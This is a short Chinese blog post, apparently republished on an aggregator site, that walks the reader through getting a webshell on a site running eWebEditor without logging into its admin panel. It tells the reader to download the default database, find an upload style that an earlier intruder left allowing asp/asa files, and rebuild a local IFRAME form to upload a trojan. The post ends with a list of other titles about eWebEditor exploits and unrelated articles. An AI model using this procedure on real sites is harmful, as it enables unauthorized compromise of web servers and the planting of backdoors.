不登陆后台也可以拿到shell,ewebeditor漏洞要小心
来源:互联网 发布:js运动小球重力 编辑:程序博客网 时间:2024/04/30 04:11
在数据库没被删掉的情况下。(默认:/db/ewebeditor.mdb)如果没删掉的话,把数据库给Down下来。
然后打开,查看Style这里,看看“前人”有没有留下痕迹 看看表格内有没有上传过asp asa等这些类型的文件,如果有往下看。
查找到这段:
<IFRAME ID=”eWebEditor1″ SRC=”../eWebEditor/ewebeditor.asp?id=content&style=s_light” FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
把那个s_light换成你刚才看到的样式名字,然后把链接补全。
<IFRAME ID=”eWebEditor1″ SRC=www.xxx.com/eWebEditor/ewebeditor.asp?id=content&style=adminone1 FRAMEBORDER=”0″ SCROLLING=”no” WIDTH=”630″ HEIGHT=”420″> </IFRAME>
然后另存为在本地,在本地打开,提交。
如果不出意外,就应该能看到你提交的马了。
- 不登陆后台也可以拿到shell,ewebeditor漏洞要小心
- ewebeditor不登陆后台也有机会拿shell
- ewebeditor不进后台照样拿SHELL
- ewebeditor后台拿shell
- 后台登陆漏洞修补
- eWebEditor漏洞
- eWebEditor漏洞
- ewebeditor漏洞
- ewebeditor漏洞,ewebeditor漏洞攻击
- Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL
- Padding也要小心
- eWebEditor session欺骗漏洞
- 关于eWebEditor编辑器漏洞
- eWebEditor漏洞 [转]
- ewebeditor遍历路径漏洞
- ewebeditor漏洞利用总结
- ewebeditor漏洞利用总结
- ewebeditor漏洞大全
- PHPEclipse安装
- 浅谈网站PR值 如何提高PR值
- 苹果今日之成功源自十年前四项投资
- 我的2010
- 我的第一篇文章
- 不登陆后台也可以拿到shell,ewebeditor漏洞要小心
- 2.2-7
- s3c2440启动文件详细分析
- s3c2440启动文件详细分析
- 2.3.5
- 2.3.6
- Android Unparsed aapt error(s)! Check the console for output错误修改
- 测量C#代码的运行时间
- 2.4-2